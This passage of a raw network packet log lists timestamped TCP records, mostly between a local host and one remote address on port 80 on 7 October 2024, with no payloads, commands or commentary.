                                                                                                                                      Oct 7, 2024 03:23:19.828650951 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828675985 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828679085 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828681946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828690052 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828701019 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828717947 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828722000 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828722000 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828741074 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828751087 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828758001 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828762054 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828771114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.828790903 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828798056 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.828815937 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835397959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835407972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835419893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835441113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835452080 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835464001 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835467100 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835475922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835505009 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835525036 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835688114 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835697889 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835736990 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835783958 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835797071 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835805893 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835818052 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835822105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835829020 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835838079 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835840940 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835849047 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835853100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835860968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835864067 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835876942 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835881948 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835902929 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835920095 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835922956 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835932016 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835942030 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835951090 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835954905 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835967064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.835967064 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835978985 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.835989952 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.836004019 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.850786924 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:19.855242968 CEST49893443192.168.2.4184.28.90.27
                                                                                                                                      Oct 7, 2024 03:23:19.876197100 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876375914 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876384974 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876399994 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876411915 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876430035 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876430035 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876441956 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876452923 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876458883 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876462936 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876471996 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876477003 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876488924 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876492023 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876504898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876508951 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876514912 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876528025 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876532078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876542091 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876549006 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876555920 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876569033 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876574039 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876578093 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876590014 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876591921 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876600981 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876610994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876611948 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876624107 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876632929 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876635075 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876646996 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876657009 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876667976 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876672983 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876686096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876687050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876698017 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876707077 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876708984 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876720905 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876723051 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876732111 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876735926 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876744986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876751900 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876755953 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.876771927 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.876792908 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877473116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877481937 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877528906 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877540112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877572060 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877578974 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877583027 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877600908 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877610922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877618074 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877623081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877638102 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877657890 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877679110 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877707958 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877717018 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877732038 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877743006 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877743959 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877754927 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877767086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877768993 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877779007 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877789021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877803087 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877811909 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877814054 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877829075 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877850056 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877873898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877883911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877917051 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877928972 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877939939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877971888 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877976894 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.877983093 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.877993107 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878005981 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878009081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878020048 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878021955 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878031015 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878041983 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878051043 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878067970 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878070116 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878082991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878089905 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878102064 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878110886 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878115892 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878125906 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878129959 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878137112 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878139019 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878151894 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878154039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878168106 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878175020 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878180027 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878190994 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878206968 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878211021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878220081 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878231049 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878252983 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878268957 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878271103 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878285885 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878295898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878305912 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878319979 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878329039 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.878343105 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.878360987 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.899425030 CEST44349893184.28.90.27192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917057037 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917092085 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917102098 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917114019 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917172909 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917177916 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917185068 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917196989 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917202950 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917228937 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917233944 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917241096 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917282104 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917293072 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917303085 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917314053 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917330980 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917345047 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917354107 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917357922 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917367935 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917378902 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917388916 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917397022 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917402029 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917408943 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917418957 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917438030 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917460918 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917490005 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917500973 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917510986 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917521000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917531013 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917532921 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.917551041 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.917572975 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924022913 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924034119 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924052000 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924067974 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924079895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924092054 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924094915 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924105883 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924115896 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924117088 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924132109 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924165010 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924176931 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924185991 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924195051 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924205065 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924210072 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924216032 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924222946 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924246073 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924278021 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924288034 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924298048 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924307108 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924309015 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924319029 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924329996 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924331903 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924356937 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924372911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924377918 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924390078 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924401045 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924408913 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924413919 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924422026 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924424887 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924436092 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.924452066 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924452066 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924459934 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.924478054 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.964924097 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.964943886 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.964963913 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.964975119 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.964986086 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965006113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965020895 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965030909 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965044022 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965065002 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965075016 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965090036 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965102911 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965115070 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965123892 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965186119 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965198040 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965217113 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965234995 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965266943 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965276957 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965287924 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965303898 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965311050 CEST4987980192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:19.965322018 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965333939 CEST8049879185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:19.965337992 CEST4987980192.168.2.4185.215.113.103
